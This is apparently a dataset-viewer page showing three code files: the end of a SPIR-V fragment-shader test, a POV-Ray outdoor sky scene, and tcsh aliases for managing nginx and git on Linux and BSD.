OpStore %foo %float_4
OpBranchConditional %false %22 %24
%24 = OpLabel
OpBranch %27
%27 = OpLabel
OpLoopMerge %29 %30 None
OpBranch %28
%28 = OpLabel
OpBranch %30
%30 = OpLabel
OpStore %foo %float_5
OpBranchConditional %false %27 %29
%29 = OpLabel
%34 = OpLoad %float %foo
OpStore %FragColor %34
OpReturn
OpFunctionEnd
| GLSL | 3 | Alan-love/filament | third_party/spirv-cross/shaders/asm/frag/do-while-statement-fallback.asm.frag | [
"Apache-2.0"
] |
global_settings {
assumed_gamma 1.0
noise_generator 1
}
// Camera
camera {
location <0, 10, -3>
look_at <0, 11, 0>
angle 90
}
// Sunlight
light_source {
<2000, 2000, -2000>
color rgb <1, 1, 1>
}
// Blue sky
plane {
y, 10000
hollow
pigment {
color rgb <0.05, 0.25, 0.6>
}
finish {
ambient 1
diffuse 0
}
}
// Clouds
plane{
y, 1
hollow
pigment {
bozo
turbulence 0.65
omega 0.7
lambda 2.5
octaves 10
color_map {
[0.0 color rgb <0.7, 0.7, 0.7>]
[0.1 color rgb <1, 1, 1>]
[0.5 color rgbt <1, 1, 1, 1>]
[1.0 color rgbt <1, 1, 1, 1>]
}
}
finish {
ambient 1
diffuse 0
}
scale 1000
}
// Fog
fog {
distance 300000
color rgb <1, 1, 1>
}
// Field
plane {
y, 0
pigment {
color rgb <0.28, 0.52, 0.00>
}
normal {
bumps 0.75
scale 0.02
}
}
| POV-Ray SDL | 4 | spcask/pov-ray-tracing | src/scene22.pov | [
"MIT"
] |
### GNU/LINUX
alias ng.status systemctl status nginx
alias ng.reload systemctl reload nginx
alias ng.restart systemctl restart nginx
alias ng.test '/usr/sbin/nginx -t -c /etc/nginx/nginx.conf'
alias ng.dump '/usr/sbin/nginx -T -c /etc/nginx/nginx.conf'
alias CD_NGX_ROOT 'cd /etc/nginx && ls -lh'
alias CD_NGX_LOGS 'cd /var/log/nginx && ls -lh'
alias CD_NGX_ACME 'cd /var/www/acme/.well-known/acme-challenge && ls -lh'
### BSD
alias ng.status /usr/local/etc/rc.d/nginx status
alias ng.reload /usr/local/etc/rc.d/nginx reload
alias ng.restart /usr/local/etc/rc.d/nginx restart
alias ng.test '/usr/local/sbin/nginx -t -c /usr/local/etc/nginx/nginx.conf'
alias ng.dump '/usr/local/sbin/nginx -T -c /usr/local/etc/nginx/nginx.conf'
alias CD_NGX_ROOT 'cd /usr/local/etc/nginx && ls -lh'
alias CD_NGX_LOGS 'cd /var/log/nginx && ls -lh'
alias CD_NGX_ACME 'cd /var/www/acme/.well-known/acme-challenge && ls -lh'
### GIT
alias git.log 'git log --oneline --decorate --graph --all'
alias git.commit 'git add . && git commit -m "uncommited changes"'
alias git.sync 'git pull origin master && git fetch --all && git fetch --prune --tags'
alias git.push 'git push origin master && git push origin --tags --force'
alias git.force 'git push origin master --force && git push origin --tags --force'
alias git.remote 'git remote update && git status -uno && git show-branch *master'
alias git.reset 'git add . && git reset --hard HEAD'
### OTHER
alias http.server 'python3 -m http.server 8080 --bind 127.0.0.1'
| Tcsh | 3 | Muzsor/nginx-admins-handbook | lib/nginx/snippets/skel/global-aliases.csh | [
"MIT"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.